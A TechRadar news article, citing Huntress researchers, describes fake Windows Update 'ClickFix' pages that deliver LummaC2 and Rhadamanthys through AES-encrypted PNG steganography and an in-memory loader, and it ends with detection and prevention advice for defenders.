- Fake Windows updates deliver advanced malware hidden inside encrypted PNG images
- Hackers trick victims with refresh screens that secretly execute malicious commands
- Stego Loader reconstructs dangerous payloads completely in memory using C# routines
Hackers are increasingly using fake Windows Update screens to distribute complex malware through social engineering tactics.
ClickFix attacks convince users to execute commands in Windows by mimicking legitimate refresh prompts on full-screen web browser pages, Huntress researchers Ben Folland and Anna Pham found.
The experts reported that in some cases, attackers instruct victims to press certain keys, which automatically insert malicious commands into the Windows Run box.
Steganography and multi-step payload
These commands then trigger the execution of malware, bypassing standard system protections and affecting both individual and corporate systems.
The malware payloads are hidden using steganography inside PNG images, encrypted with AES and reconstructed by a .NET assembly called Stego Loader.
This loader extracts the shellcode using custom C# routines and repackages it with the Donut tool, allowing the execution of VBScript, JScript, EXE, DLL files, and .NET assemblies entirely in memory.
Analysts identified the resulting malware as variants of LummaC2 and Rhadamanthys.
The use of steganography in these attacks shows that malware delivery is moving beyond traditional executable files, creating a new challenge for threat detection and incident response teams.
Attackers also implement dynamic evasion tactics such as trampoline, which calls thousands of empty functions to make analysis more difficult.
A variant using the fake Windows Update decoy was discovered in October 2025, and law enforcement disrupted part of its infrastructure through Operation Endgame in November.
This prevented the final payload from being delivered via malicious domains, although the fake update pages remain active.
The attacks continue to evolve, alternating between human confirmation prompts and refresh animations to trick users into executing commands.
The researchers recommend monitoring process chains for suspicious activity, such as explorer.exe spawning mshta.exe or PowerShell.
Investigators can also review the RunMRU registry key for executed commands.
Organizations are advised to combine malware removal methods with antivirus scanning and firewall protection to limit exposure.
Disabling the Windows Run box where possible and carefully inspecting image-based payloads are additional recommended precautions.
Companies must account for risks arising from legitimate-looking assets such as images and scripts being weaponized, complicating logging, monitoring and forensic analysis.
This also raises concerns about supply chain security and the potential for attackers to exploit trusted update mechanisms as entry points.
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews and opinions in your feeds. Be sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, video unboxings, and get regular updates from us on WhatsApp also.
